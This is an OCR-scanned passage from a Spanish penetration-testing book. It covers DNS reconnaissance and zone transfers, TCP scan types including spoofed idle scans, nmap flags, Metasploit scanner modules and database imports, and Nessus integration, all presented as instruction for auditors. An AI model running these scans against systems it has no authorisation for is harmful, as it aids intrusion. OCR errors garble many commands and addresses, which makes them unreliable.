>  inf ormatica64.com 

Server:  8. 8, 8. 8 

Address:  8.8.8.B#53 

Non-authoritative  answer:  L 

Name:  informatica64.com  '  / 

Address:  SB. 81. 106.147 

infomatica64.com  nameserver  =  ns2.informatica64.eoni.  \ 

infonnatica64.com  nameserver  =  nsl.informatica64.com.  .  / 

inforaatica64.com  / 

»  origin  =  nsl.inform3tica64.com  ,  I 

mail  addr  *  rodol. inf ormatica64.com 
serial  =  2805101226 
refresh  =  3600 
retry  =  3600 
expire  =  1209608 
minimum  =  3690 

informatica64.com  mail  exchanger  =  10  correo. inf ormatica6|l. com. 

infonnatica64.com  text  =  "v=spfl  a  a: mail. inf ormatica64.net  a:correo. informatica64.com  ip4 

: 80 . 81 . 186 ■ 148  ip4 : B8 . 81 . 186 . 146  -all“ 


Fig  2.!%:  Ilecofeccion  de  servidores  eon  nstookup. 


Transferencia  de  zona 

Lqs  DNS  permiten  dividir  el  espacio  de  nombres  en  diferentes  zonas,  las  cuales  almacenan 
informacion  de  nombres  de  uno  o  m6s  dominios.  El  origen  autorizado  sobre  un  dominio  es  la  zona 
en  la  que  se  encuentra  dicho  dominio,  es  declr,  es  el  encargado  de  la  informacion  acerca  de  dicho 
dominio.  Es  extremadamenle  importante  que  las  zonas  se  encuentren  disponibles  desde  distintos 
servidores  DNS  por  tenias  de  disponibilidad. 
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Fig  2.03:  Esquema  de  zonas, 
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Las  transferences  de  zona  se  crearon  para  que  otros  servidores,  adernas  del  principal 
alojar  zonas  replicando  toda  la  informacion.  Las  transferences  de  zona  siiceden  en  las  a 


situaciones: 


-  Cuando  se  instala  un  nuevo  servidor  DNS  y  eSte  se  configure  en  una  zona  exisfei,fo 

-  Cuando  finaliza  el  plazo  de  actualization  de  una  zona. 


-  Cuando  se  produce  algun  cambio  en  pna  zona  y  es  necesario  actual  izar  para  la  replicac ion^ 
de  los  cambios. 


:  Cuando  manualmente  se  soiicita  la  transferencia  de  zona. 


En  el  siguiente  ejemplo  se  iitiliza  un  and  en  Windows  para  real  izar  la  prueba  de  concepto  o  proqj^ 
of  concept,  PoC,  de  la  transferencia  de  zona.  En  primer  lugar,  tras  lanzar  nstookup  en  un  and  sW 
modificara  la  informacion  que  se  quiere  obtener  con  el  uso  del  comando  set  q=ns.  A  continuation^ 
se  introduce  el  dominio  sobre  el  que  se  quiere  comprobar  si  existe  ta  transferencia  de  zona. 


Fig  2.04:  Conliguiacion  nstookup  para  probar  la  transferencia  de  zonas. 

Una  vez  que  se  dispone  de  los  servidores  DNS  de  la  organization  se  utiliza  el  comando  server* 
para  cambiar  el  servidor  DNS  al  que  se  realizaran  las  consultas  cop  ns  lookup.  Una  vez  realizada* 
esta  action  se  utllizara  el  comando  Is  y  e!  dominio  sobre  el  que  se  requiem  informacion,  si  ese| 
servidor  DNS  tiene  activada  la  transferencia  de  zona  se  obtendra  gran  cantidad  de  informacion,  quey 
seguramente  la  empresa  no  quiera  que  Sea  visible  o  no  sabe  que  es  visible.  En  bastantes  ocasiones, 
es  una  mala  configuration  o  tin  descuido  del  administrador  el  que  provoca  esta  situation. 


DNS  Snooping 

Este  tipo  de  ataque  se  enmarca  tambiei  ;n  la  fase  de  descubrimiento  y  recoleccion  de  infonnatib!|| 
DNS  cache  snooping,  nombre  real  de  la  .  tilnerabilidad,  es  una  tecnica  que  permite  al  auditor  cbpOccjj 
los  distintos  nombres  de  dominio  que  ban  sido  resueltos  por  el  servidor  DNS  y  cu-ales. no, . 


•  • 


El  servidor  DNS  con  esta  vulnerabilidad  esta  proporcionando  information  sobre  la  red  al  atacante, 
o  en  este  caso  at  auditor.  Esta  fuga  de  informacion  puede  ayudar  a  un  atacante  a  estudiar  y  explotar 
de  manera  eficiente  otras  vulnerabilidades. 

Tecnicas  activas 

Las  tecnicas  activas  para  recoteccion  de  informacion  consisten  en  interactuar  directamente  con  ios 
sistemas  para  aprender  mas  sobre  su  configuracion  y  comportamiento.  Ltevaran  a  cabo  un  eseaneo 
de  puertos  para  el  esludio  de  los  posibles  puertos  abiertos  que  se  enc.uen.tren  y  determinar  que 
servicios  se  estan  ejecutando,  ademas  de  la  version  del  producto  que  se  encuentra  delras  del  puerlo. 

En  los  sistemas  cada  puerlo  que  se  encuentra  abierto  da  una  via  de  explotacion  at  auditor,  por  lo 
que  esta  informacion  es  muy  valorada  en  esta  fase.  Hay  que  conocer  los  tipos  de  escaneos  que 
se  encuentran  disponibles  y  saber  configurar  las  herramientas  para  poder  obtener  el  maximo  de 
informacion  posibie.  Hay  que  tener  cuidado  con  los  IDS(7 ntrusion  Detection  System),  y  firewalls 
que  se  puedan  encontrar  en  el  analisis  de  puertos. 

Tipos  de  eseaneo 

Existen  gran  cantidad  de  tipos  de  escaneos,  con  diferentes  objetivos.  A  continuation  se  van  a  estudiar 
los  mismos.  Herramientas  como  nmap  disponen  de  gran  versatiiidad  y  posibilidad  de  coniiguracidn, 
es  recomendable  estudiar  el  uso  y  configuracion  de  esta  potenle  herramienta. 

Half  Scan  i 

Este  tipo  de  eseaneo  consiste  ep  realizar  el  procedimiento  three-way  handshake  sin  conciuir  por 
completo  para  no  crear  una  conexion.  En  otras  palabras,  el  emisor  envla  un  SYN  para  iniciar 
conexion,  si  el  receptor  envla  un  SYN+ACK  significa  que  el  puerto  se  encuentra  abierto,  entonces 
el  emisor  envla  un  RST+ACK  para  finalizar  la  conexion,  en  vez  de  un  ACK  que  seria  lo  normal  para 
crear  la  conexion.  La  viabilidad  de  este  tipo  de  eseaneo  es  alia,  con  gran  fiabilidad  en  su  ejecucion. 


ens  f  >  use  auxiUary/scaimer/portscan/tcp 

res f  auxiliary! tep)  >  show  options 

Module  options  (auxiliary/scaoner/portscan/tcp): 

Name  Current  Setting 

Required 

Description 

CQNCUHRENCY  10 

yes 

The  number  of  concurrent  ports  to  check  per  host 

FILTER 

no 

The  filter  string  for  capturing  traffic 

INTERFACE 

no 

The  name  of  the  interface 

PCAPFILE 

no 

The  name  of  the  PCAP  capture  file  to  process 

PORTS  1-10060 

yes 

Ports  to  scan  (e.g.  22-25,88,110-900) 

RHOSTS  192.168.1.39 

yes 

The  target  address  range  or  CIDR  identifier 

SNAPLEN  65535 

yes 

The  number  of  bytes  to  capture 

THREADS  1 

yes 

The  number  of  concurrent  threads 

TIMEOUT  1000 

yes 

The  socket  connect  timeout  in  milliseconds 

VERBOSE  false 

no 

Display  verbose  output 

msf  auxiliary(tcp)  >  run 

(>)  192.168 . 1.39:139  -  TCP  OPEN 

j*j  192.168.1.39:135  -  TCP  OPEN 
1*1  192. 16B.  1.39: <145  -  TCP  OPEN 

Fig  2.06:  Eseaneo  de  lipo  half  scan. 
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Metasploit  dispone  de  un  modulo  de  tipo  auxiliary  para  realizar  este  tipo  de  escaneos.  El  modu  lo  se 
encuentra  en  la  ru  ta  auxiliary/s  cann  er /por Is  can/ tep .  At  mirar  las  opciones  se  puede  configurar  las 
direcciones  IP  a  escanear,  el  rango  de  puertos  que  se  anatizaran,  la  variable  pcapfile  donde  se  puede 
indicar  la  ruta  de  una  caplura  de  red  con  la  que  el  modulo  procese  ta  informacion  y  la  muestre,  e! 
timeout,  etcetera.  Este  pequeiio  modulo  es  bastante  util  para  realizar  este  tipo  de  eseaneo. 

ACK  Scan 

La  fmaiidad  de  este  eseaneo  es  distinta,  no  es  determinar  si  un  puerto  se  encuentra  abierto  o  no,  si 
no  si  un  equipo  de  ta  red  escucha  las  peticiones  a  traves  de  un  firewall.  Ei  emisor  envla  un  paquete 
con  un  ACK  activoj  el  receptor  debe  responder  con  un  RST  este  el  puerto  abierto  o  no,  si  no  existe 
respuesta  es  que  hay  un  cortafuegos  en  medio  de  la  comunicacion. 

Metasploit  dispone  de  un  modulo,  como  el  anterior  de  tipo  auxiliary,  para  llevar  a  cabo  este  tipo  de 
escaneos  y  pruebas  sobre  equipos  remotos  y  la  comunicacion  con  estos.  El  modulo  se  encuentra  en 
la  ruta  auxiliary/scanner/portscan/ack .  Al  mirar  las  opciones  se  pueden  configurar  las  direcciones  i  P 
a  escanear,  el  rango  de  puertos  que  se  estudiaran,  entre  otros  vatores  interesantes. 

Null  Scan 

Este  tipo  de  eseaneo  tiene  una  caracterlstica  curiosa  y  es  que  el  paquete  que  se  envla  no  contiene 
ningun  bit  activo.  El  emisor  envla  este  tipo  de  paquetes  y  si  el  puerto  se  encuentra  abierto  no  se 
recibira  nada,  si  por  el  contrario  el  puerto  se  encuentra  cerrado  se  envla  un  RST+ACK.  Es  por 
ello,  que  normalmente  se  puede  encontrar  en  otros  li bros  que  este  tipo  de  eseaneo  tiene  como  tin 
averiguar  cuales  son  los  puertos  TCP  cerrados. 

Xmas  Scan 

Este  tipo  de  eseaneo  tiene  en  sus  paquetes  los  bits  de  control  activos.  Windows,  por  defecto,  no 
responde  a  este  'tipo  de  paquetes,  pero  antiguamente  la  pita  TCP/lP,  respondla  con  un  paquete 
RST+ACK  cuando  el  puerto  se  encontraba  cerrado,  mientras  que  si  el  puerto  se  encontraba  abierto 
no  se  respondla.  La  viabilidad  de  este  tipo  de  escaneos  no  es  ni  mucho  menos  optima,  inclinandose 
hacia  una  viabilidad  mala' 

as f  auxiliary(xmas)  >  use  auxiliary/scanner/portscan/xmas 
list  auxiliary (xmas)  >  show  options 

lodule  options  (auxiliary/scanner/portscan/xaas) : 

Name  Current  Setting  Required  Description 

BATCHSIZE  256  yes  The  number  of  hosts  to  scan  per  set 

INTERFACE  no  The  name  of  the  interface 

PORTS  1-10000  '  yes  Ports  to  scan  (e.g.  22-25,80,110-900) 

RHOSTS  192.168.1.39  yes  The  target  address  range  or  CIDR  identifier 

SNAPLEN  65535  yes  The  number  of  bytes  to  capture 

THREADS  1  yes  The  number  of  concurrent  threads 

TIMEOUT  500  yes  The  reply  read  timeout  in  milliseconds 

nsf  auxiliary  (xmas)  >  _ _ _ _ _ _ _ — 1 — 

Fig  2.07:  Modulo  xmas  auxiliary  de  Metasploit. 
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Metasploit  dispone  de  un  modulo,  de  tipo  auxiliary,  para  llevar  a  cabo  este  tipo  de  escaneo.  Este 
modulo  se  encuentra  en  la  rata  aux i / iary/scann er/portscan/xm as .  Las  opciones  que  dispone  son 
parecidas  a  las  del  modulo  de  escaneo  de  tipo  ACK. 

FIN  Scan 

Oste  tipo  de  escaneo  consiste  en  la  creation  de  un  paquete  TCP  eon  el  bit  de  FIN  active.  El  emisor 
envla  el  paquete  y  si  el  puerto  se  encuentra  abierto  no  se  obtendra  respuesta,  sin  embargo,  si  el  puerto 
se  encuentra  cerrado  se  recibira  un  RST+ACK.  El  objetivo  o  fmalidad  de  este  tipo  de  escaneo  es 
identico  al  null  scan  y  xmas  scan,  incluso  algunos  au tores  los  agrupan  como  escaneos  de  deteccion 
de  puertos  cerrados  a  estos  tipos. 

Connect  Scan 

Es  un  tipo  de  escaneo  antiguo,  y  quiza  uno  de  los  menos  originalesrfle  ids  que  se  han  podido  estiidiar 
en  este  libro.  Su  luncionamiento  es  el  siguiente,  en  primer  lugar  se  realiza  el  proceso  completo  de 
three-way  handsnake ,  creando  una  conexion  entre  2  maquinas  si  e!  puerto  se  encuentra  abierto  en 
la  maquina  vlctima.  Una  vez  que  la  conexion  se  encuentra  establecida  e!  servicio  que  se  encuentra 
dclias  oe  diclio  puei  to  se  identifica  enviando  el  banner  del  servicio,  En  este  punto  el  emisor  envla  un 
ACK  y  por  ultimo  un  RST+ACK  para  forzar  e!  cierre  de  la  conexion.  Se  puede  obtener  ademas  de  la 
conclusion  de  que  el  puerto  esta  abierto  o  no,  la  identificacion  del  producto  y  la  version  del  servicio. 

Idle  Scan 

Este  escaneo  es  uno  de  los  mas  complejos  y  su  eficacia  depende  de  la  maquina  elegida  como  zombie. 
En  el  escenario  habra  al  menos  3  maquinas,  una  es  la  del  atacante,  otra  sera  la  zombie  o  intermediary 
y  la  ultima  la  vlctima.  La  maquina  del  atacante  debe  chequear  que  el  zombie  utiliee  tin  afgoritmo 
predecible  para  marcar  los  paquetes  IP.  Para  averiguar  este  detaile  el  emisor  o  atacante  envla  varios 
paquetes  con  SYN+ACK  para  iniciar  una  conexion.El  objetivo  es  obtener  RSTy  chequear  que  los 
I  D  de  las  respuestas  scan  sucesivas  o  predecibles.  Tambien  se  debe  verificar  que  la  maquina  zombie 
no  este  teniendo  trafico,  ya  que  si  no  el  proceso  sert'a  inviable. 

C  uando  el  a  tacante  haya  encontrado  una  maquina  zombie  que  pueda  ser  utilizada,  el  atacante  enviara 
paquetes  SYN  a  la  maquina  vlctima  haciendo  IP  Spoofing.  Los  paquetes  enviados  desde  la  maquina 
atacante,  con  la  direccion  IP  de  la  maquina  zombie,  a  la  vlctima  son  en  realidad  un  scan  normal.  La 
dilerencia  se  encuentra  en  que  las  respuestas  cle  la  vlctima  iran  destinadas  a  la  maquina  zombie,  por 
la  suplantacion  de  IP  realizada  por  el  atacante. 

Cuando  In  victima  conteste  a  la  peticion  SYN,  devolved  un  SYN+ACK  si  e!  puerto  se  encuentra 
abierto  o  un  RST+ACK  si  el  puerto  se  encuentra  cerrado.  Cuando  la  maquina  zombie  recibo  un 
SYN+ACK  enviara  un  RST  a  la  maquina  victima.  Si  la  maquina  zombie  recibe  un  RST+ACK,  se 
deelarara  como  trafico  nulo  y  se  descartara. 

Tras  esperar  un  corto  periodo  de  tiempo  el  atacante  preguntara  por  el  ID  de  los  paquetes  de  la 
maquina  zombie  y  pueden  ocurrir  2  situaciones  concretas,  en  primer  lugar  el  ID  se  ha  incrementado 
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en  uno,  entonces  el  puerto  en  la  maquina  victima  esta  abierto,  o  por  el  contrario  si  el  ID  no  se 
incrementado,  el  puerto  se  encuentra  cerrado. 


nmap  ^ 

Esta  herramienta,  immdiaimente  conocida,  perniite  al  auditor  explorar  los  puertos  abSertos 
deteccion  de  servicios,  averiguar  versiones  de  productos ,  fingerprint  del  ststema  operativo,  entifl 
otras  acciones.  La  herramienta  se  encuentra  disponible  tanto  para  sistemas  Linux  como  Windows.  ^ 

nmap  puede  suponer,  a  primera  vista,  una  herramienta  costosa  de  utilizer  por  su  flexibilidad 
diversidad  en  las  posibles  acciones  a  realizar  con  el  la.  Es  verdad  que  dispone  de  gran  cantidad  cL 
parametros,  por  lo  que  se  intentara  lister  algunos  de  interes  relacionados  con  los  tipos  cle  escanereP 
vistos  en  este  libro.  Tambien,  se  puede  recomendar  el  uso  de  interfaces  graficas  para  la  utilizacic^f 
de  nmap,  y  de  este  modo  simpiificar  e!  entendimiento  y  uso  de  la  herramienta. 


La  ejecucion  de  lo^  comandos  nmap  se  puede  generalizar  mediante  el  siguiente  esquema  mna^ 
<tipo  de  scari>  <opciones>.  La  ejecucion  por  defeeto  seria  la  siguiente  nmap  <direccion  IP>,  co^ 
la  que  se  obtiene  un  reporte  de  la  maquina  con  dicha  direccion  IP  donde  se  in  forma  cle  los  puertoP 
abiertos,  servicios  encontrados  o  el  estado  de  la  maquina.  Para  ser  el  escaneo  por  defeeto  no  es  pocP 
la  informacion  obtenida.  ” 


A  continuacion  se  listan  los  diferentes  parametros  que  se  deben  anadir  a  la  ejecucion  de  nmap  para 
obtener  distintos  rcsultados,  en  funcion  de  los  tipos  de  escaneos  vistos  anteriormente.  " 


Parametro 

- — . . . . — - 

Description  y  ejemplo  jg 

-0 

El  escaneo  realizara  fingerprint  del  sistema  operativo  con  el  objetivo  de  obtener  la  L 
version  de  este  en  la  o  las  maquinas  remotas.  Ejemplo:  nmap  -0  <direccion  IP>  f 

-sP 

Con  este  parametro  se  analiza  que  equipos  se  encuentran  activos  en  una  red.  ^ 
Ejemplo:  nmap  -sP  192. 1 68. 0. 0/24  i 

-sS 

Se  lanza  un  escaneo  sobre  varios  equipos  o  una  red.  Perniite  obtener  tin  listado  de  | 
puertos  abiertos  de  estos.  Ejemplo:  nmap  -sS  192.168.0.0/24 

-sN 

Permite  realizar  un  escaneo  de  tipo  Null  Scon.  Ejempfo:  nmap  -sN  <direccidn  ^ 
IP>  t 

-sF 

Permite  realizar  un  escaneo  de  tipo  FIN  Scan.  Ejemplo:  nmap  -sF  <direccion  I 

in _  i 

-sX 

Permite  realizar  un  escaneo  de  tipo  XMAS  Scan.  Ejemplo:  nmap  —sX  <direccion  d 
IP>  t 

-P 

Se  indica  sobre  que  puertos  se  debe  realizar  el  escaneo.  Ejemplo:  nmap  ~p  % 
139,80,3389  <direccion  1P>.  Para  indicar  rangos  especificamos  el  puerto  cle  la  | 
siguiente  manera  80-1500.  Se  realizara  tin  analisis  ciesde  el  puerto  80  hasta  el  1 
1500  1 
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Parametro 

Descripclon  y  ejemplo 

-A 

Este  parametro  habilita  la  deteccion  del  sistema  operativo,  ademas  de  las  versiones 
de  servicios  y  del  propio  sistema.  Ejemplo:  nmap  ~A  <direccidn  IP> 

-si 

Permite  realizar  un  escaneo  de  tipo  idle.  Ejemplo:  nmap  - P0  -p  ~  ~sl  <direccion 
zombie>  <direccidn  viciima>.  Cabe  destacar  que  la  opcion  -p  -  permite  realizar 
un  escaneo  sobre  todos  los  puertos  de  la  maquina,  esta  accion  puede  provocar  que 
el  escaneo  se  ralentiee  en  gran  medida 

-sV 

Obtener  las  versiones  de  los  productos.  Ejemplo:  nmap  -s  V  <direccidn  IP> 

-oX 

Permite  exporter  la  informacion  del  analisis  en  un  archivo  XML.  Ejemplo:  nmap 
-0  -sV  <direccion  IP>  -oX archivo.xml.  Con  la  option  -oN  se  puede  exportar  la 
informacion  en  un  fichero  de  texto 

Tabla  2.0 1 :  Parametros  para  oblener  informacioit  variada  con  nmap. 

Hay  que  ctestacar  que  cuando  nmap  devuelve  que  un  numero  determinado  de  puertos  han  sido 
fillrados,  no  quiere  decir  que  determinados  esten  cerrados..  Cuando  el  mensaje  indique  que  el  puerto 
se  encuentra  filtrado,  quiere  decir  que  esa  maquina  dispone  de  un  firewall  el  cual  esta  fiitrando  esas 
peticiones  a  ciertos  puertos,  tnientras  que  si  el  mensaje  indica  que  el  puerto  esta  cerrado  quiere  decir 
que  se  ha  obtenido  respuesta  de  la  maquina  al  analizar  ciertos  puertos,  pero  que  estos  se  encuentran 
sin  ningun  servicio. 

Existen  otros  estados  que  son  los  siguientes: 

-  Cerrado,  el  puerto  es  accesible  pero  no  hay  servicio  en  el 

-  No  filtrado,  el  puerto  es  accesible  pero  no  se  puede  determinar  si  se  encuentra  abierto  o 
cerrado 

-  Otros  2  estados  que  indican  que  no  se  puede  determinar  si  ei  puerto  esta  abierto  o  filtrado, 
y  si  el  puerto  esta  cerrado  o  filtrado. 

Una  de  las  operatives  mas  interesantes  es  la  evasion  de  sistemas  de  detection  de  intrusos  mediante 
Ja  fragmentation  de  los  paqueles,  spoofing  de  direcciones  MAC,  sefiuelos,  spoofing  de  direcciones 
IP,  etcetera.  Para  obtener  mas  informacion  sobre  las  posibilidades  de  nmap  se  aconseja  la  visita  y 
lectura  del  sitio  web  oficial  http://nmap.org/man/es/. 

Importation  de  resultados  de  nmap  a  Metasploil 

Este  apartado  es  realmente  interesante  ya  que  Metasploit  permite  la  importation  de  los  resultados 
obtenidos  con  la  herramienta  nmap.  La  utilization  de  tal  importation  esta  justificada,  ya  que  cuando 
se  realiza  un  test  de  intrusion  con  gran  numero  de  maquinas  y  aspectos  a  tener  en  cuenta  se  deben 
controlar  todos  estos. 

En  el  libro  se  utilizara  el  motor  PostgreSQL,  pero  se  pueden  utilizar  otros,  como  por  ejemplo,  MySQL. 
En  primer  lugar  se  debera  disponer  de  la  base  de  datos  arrancada,  por  lo  que  la  primera  action  a 
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llevar  a  cabo  es  /etc/imt.d/posigresql-8. 4  start ,  la  version  puede  variar  en  funcion  de  la  descarga 
realizada  de  PostgreSQL.  Pueden  surgir  ciertos  aspectos  o  problemas  que  impidan  la  creation  de  las 
tablas,  por  parte  del  framework.  Por  ejemplo,  la  contrasena  del  usuario  postgres,  para  cambi  ar  dieha 
contrasena  debe  ejeeutarse  las  siguientes  drdenes  como  se  puede  observar  en  la  siguiente  imagen. 

I 

root@root:~#  siido  su  postgres  -c  psql 
could  not  change  directory  to  "/root" 
psql  (8.4.8) 

Type  "help'1  for  help. 

postgres^#  alter  user  postgres  with  password  '123abc.*; 

ALTER  ROLE 
postgres^#  \q 

could  not  save  history  to  file  “/home/postgres/.psqlhistory":  No  such  file  or  d 

i  rectory  _ _ _ _ 

Fig  2.08:  Modification  de  eredenciales  del  usuario  postgres. 

msf  >  db_connect  postgres:123abc.@127.0.0.1/test_libro 

NOTICE:  CREATE  TABLE  will  create  implicit  sequence  "liosts_id  ,seq"  for  serial  co 
lumn  "hosts. id" 

NOTICE:  CREATE  TABLE  /  PRIMARY  KEY  will  create  implicit  index  "hosts_pkey"  for 
table  “hosts" 

NOTICE:  CREATE  TABLE  will  create  implicit  sequence  "clientsidseq"  for  serial 
column  "clients. id" 

NOTICE:  CREATE  TABLE  /  PRIMARY  KEY  will  create  implicit  index  "clients_pkey*‘  fo 
r  table  "clients" 

NOTICE:  CREATE  TABLE  will  create  implicit  sequence  “services_id_seq"  for  serial 

column  "services. id" .  . . . 

Fig  2.09:  Conexion  framework  con  la  base  de  dales. 

Para  comprobar  el  estado  del  framework  respecto  a  la  base  de  datos  se  puede  utilizar  el  comando 
dbjtatus.  Si  todo  ha  ido  correctamente  se  obtendra  el  mensaje  postgresql  connected  to  <nombre 
bbdd>. 

A  continuacion  se  debe  importar  el  fichero  generado  anteriormente  con  nmap,  el  cual  dispone  de  los 
distintos  resultados  obtenidos  con  esta  herramienta.  El  comando  para  realizar  dicha  importacidn  cs 
dbjmport  <fichero  XML> . 

msf  >  db_import  resultadosNI4AP.xml 

[*1  Importing  ’Nmap  XML'  data 

[*]  Importing  host  192.168.1.39 

[*]  Successfully  imported  / root/ resultadosNMAP . xml 

msf  > _ _ _ 

Fig  2. JO:  Imporlacion  de  resultados  de  nmap  a  Metasploil. 

Una  vez  se  ha  importado  el  fichero  correctamente  se  disponen  de  ciertos  comandos  que  interactuan 
coil  la  information  almacenada  como  son  dbjiosis,  db_services,  dbjioles ,  entre  otros. 

El  comando  dbjiosts  permite  realizar  busquedas  y  consultas  sobre  la  informacion  de  los  equipos 
que  se  encuentran  importados  en  la  base  de  datos.  Hay  que  tener  en  cuenta,  que  cuando  se  utiliza 
una  base  de  datos  es  que  se  dispone  de  gran  cantidad  de  information  sobre  equipos,  servicios  de 
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eslos,  versiones  de  los  servicios,  etcetera.  Es  por  ello  que  el  comando  dbjiosts  es  fundamental  para 
realizar  consuitas  sobre  caracteristicas  de  algunos  equipos  y  delimitar  el  tango  de  action. 


Los  parametros  de  dbjiosts  son  los  que  se  pueden  visualizar  a  continuation. 


\  Parametro 

Description  y  ejemplo 

-a 

Realiza  una  busqueda  de  direcciones.  Ejemplo:  db  jiosts  -a  <direccion], 
direccidn2, ....  direccionN> 

! 

-c 

Filtra  informacibn  de  las  columnas  que  se  requiera.  Ejemplo:  db  hosts  -c 
<coIumnal,  colmma2, ...,  columnaN>.  Las  columnas  pueden  ser  name,  os  name, 
state,  address,  os  Jang,  os  sp,  etcetera 

-u 

Solo  muestra  los  equipos  que  se  encontraban  activos  o  levantados.  Ejemplo:  dh_ 
hosts  —u 

-0 

Se  envia  la  salida.  a  un  fichero  en  formato  CSV.  Ejemplo:  dbjiosts  -o  <jichero> 

-R 

Se  anade  a  la  variable  RHOSTS  las  maquinas,  obtenidas  en  la  busqueda.  Ejemplo 
dbjiosts  ~R  i 

Tabia  2.02:  Parametros  para  obtener  informacion  variada  con  dbjiosts. 

El  comando  dbjervices  permite  obtener  information  sobre  !os  distintos  servicios  disponibies 
en  las  maquinas  analizadas,  piiertos  abiertos,  protocolos,  etcetera.  Este  comando  dispone  de  los 
mismos  parametros  que  dbjiosts,  con  el  mismo  significado,  pero  ademas  aporta  otros  que  ailaden 
func  ion  alidad. 


|  Parametro 

Descripcion  y  ejemplo 

\ 

1 

-11 

Realiza  una  busqueda  por  nombre  de  servicios.  Ejemplo:  db_services  -n  nethios- 
ssn 

-P 

Realiza  una  busqueda  por  puertos.  Ejemplo:  dbjervices  -p  139,445,3389.  Se 
devuelve  la  maquina  que  dispone  de  atgu.no  de  los  puertos  abiertos 

-r 

Muestra  solo  informacibn  sobre  protocolo  TCP  6  UDP.  Ejemplo  dbjervices -r 
tcp 

Tabia  2.03:  Parametros  para  obtener  informacion  variada  con  db  services. 


Es  importante  recalcar  que  los  parametros  deben  ser  ejecutados  utifizando  varios  a  la  vez  para  afinar 
las  busquedas  y  sacar  el  maximo  provecho  de  la  base  de  datos  y  el  proceso  de  fillrado  sobre  esta.  For 
ejemplo,  db  services  -a  192.168.1.39  -n  msrpc  -r  tcp,  de  esta  manera  se  esta  filtrando  con  mayor 
restriction  y  segtiro  que  el  auditor  consigue  afinar  mas  su  busqueda. 

El  comando  db  notes  permite  al  auditor  visualizar  notas  o  informacion  sobre  ios  equipos.  Este 
comando  dispone  de  un  parametro  que  es  el  -a  con  el  que  el  auditor  puede  realizar  busqueda  de 
notas  de  equipos  a  traves  de  sus  direcciones  IP. 


Ei  comando  dbjulns  permite  al  auditor  obtener  informacion  sobre  las  vuinerabilidades  que  disponen 
los  equipos  escaneados.  Ademas,  se  obtiene  la  referenda  de  la  vulnerabilidad  por  lo  que  se  puede* 
obtener  informacion  extra  faeilmente  buscandola  en  sitios  web  como  http://cvejnitre.org/mdex.htmli 
b  http://www.securUyfociis.com. 

V 

Integra  cion  de  nmap  con  el  framework  i 

Metasploit  dispone  de  la  posibilidad  de  utilizar  la  herramienta  nmap  de  manera  integrada  con  el ^ 
framework.  Se  recomienda  la  utilizacion  de  nmap  con  Metasploit  y  el  tiso  cle  la  base  de  datos,  que  se  , 
ha  explicado  en  el  apartado  anterior,  de  esta  forma  se  puede  almacenar  toda  la  informacion  posible,  ' 
para  ast  despties  poder  consultar  dicha  informacion,  o  utilizar  la  tecnica  autopwn  para  probar  la 
seguridad  de  los  equipos.  ! 

V  i 

El  comando  para  utilizar  nmap  en  la  msfcomofe  de  Metasploit  es  dbjvnap.  Por  debajo  se  utiliza 
nmap  por  lo  que  las  opciones  son  las  mismas.  Tras  la  utilizacion  de  dbjimap,  si  se  dispone  de  la 
conexibn  con  fa  base  de  datos,  ios  resultados  quedan  almacenados  en  esta. 


3.  Escaneres  de  vuinerabilidades 

Los  escaneres  de  vuinerabilidades  permiten  al  auditor  evaluar  sistemas  informaticos,  equipos,  redes, 
verificar  actual izaciones,  versiones,  etcetera.  Existen  gran  cantidad  de  escaneres,  ios  cuales  ayudan 
al  auditor  a  real  izar  distmtas  pruebas  y  poder  liegar  a  ciertas  concltisiones  sobre  el  status  de  seguridad 
de  una  organizacibn.  Los  escaneres  disponen  de  un  objetivo  comun,  entimerar  vuinerabilidades  de 
seguridad  en  uno  o  mas  equipos  de  una  red  u  organizacibn.  Por  otro  iado,  existen  distintos  enfoques 
en  los  escaneres  de  vuinerabilidades,  es  decir,  disponen  de  diferentes  funcionalidades  para  realizar 
la  evaiuacibn. 


La  informacibn  obtenida  tras  el  analisis  de  las  maquinas,  redes,  servicios, 
servir  al  auditor  para  detectar  vuinerabilidades  conocidas  o  recientemente 
sei-  explotadas  por  un  potencial  atacante. 


productos,  etcetera,  puede 
descubiertas  que  pudiesen 


Compatibilidad  con  los  ficheros  de  informacion  de  escaneres 

Metasploit  dispone  de  la  posibilidad  de  importar  archivos  de  escaneos  realizados  con  gran  cantidad 
de  escaneres  de  vuinerabilidades,  Esta  funeionalidad  aporta  unoivel  de  integration  del  framework 
enorrne  con  las  herram i entas  de  seguridad  que  se  encuentran  en  el  mercado. 

Los  foimatos  compatibles  con  la  importation  a  Metasploit  se  pueden  visualizar  a  continuacion: 

-  Acunetix  XhfL 

-  A  map  Log 

-  Appscan  XML 
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-  Burp  Session  XML 

-  Core  Impact  Pro  XML 

-  Foundstone  Network  Inventory  XML 

-  IP  Address  List 

-  Libpcap 

-  Microsoft  MBSA  SecScan  XML 

-  nCircle  IP360  (XMLv3  y  ASPL) 

-  Metasploit  PWDump  Export 

-  Metasploit  Zip  Export 

-  Metasploit  XML 

-  NetSparker  XML 

-  nessus  XML  y  NBE  (vJ  y  \>2) 

-  Nexpose  Simple  XML 

-  Nexpose  XML  Export 

-  Nmap  XML 

-  Qualys  Asset  XML 

-  Qualys  Scan  XML 

-  Retina  XML 

Escaner  nessus  e  importation  de  datos 

nessus  es  uno  de  los  esc&neres  con  mayor  flexibilidad  y  utilizacion  en  el  trnindo  de  la  auditoria.  Es 
una  herramienta  de  la  empresa  estadounidense  Tenable  Network  Security  la  cual  dispone  de  distintas 
funeionalidades  como  son  descubrimiento  activo  de  redes,  escaneo  de  vulnerabilidades  distribuido 
y  politicos  de  auditorias.  La  exportacion  a  ficheros  de  estos  escaneos  es  una  funcionalidad  muy 
inleresante  para  poder  exportar  los  resultados  a  Metasploit.  Se  pueden  importar  ficheros  de  tipo 
NBE  y  XML  creados  con  la  herramienta,  los  cuales  seran  importados  con  el  comando  dbjmport, 
previa  conexion  de  la  base  de  datos. 

Por  otro  lado,  el  framework  dispone  de  tin  plugin  el  cual  permite  utilizar  la  herramienta  nessus  en  el 
entorno  de  msfconsole  e  inctuir  los  resultados  directamente  en  la  base  de  datos  de  Metasploit  para 
ser  explotados  en  la  siguiente  fase  del  test  de  intrusion.  Este plugin  es  cargado  mediante  la  ejecucion 
de  la  instruction  load  nessus  en  una  sesion  de  msfconsole. 


root@root ; /opt/nessus/bin#  ./nessus -fetch  --register 

Your  activation  code  has  been  registered  properly  -  thank  you. 

Now  fetching  the  newest  plugin  set  from  plugins.nessus.org. . . _ . 


Para  usar  nessus  se  debe  disponer  de  la  herramienta  registrada,  obteniendo  un  codigo  de  activacion  en 
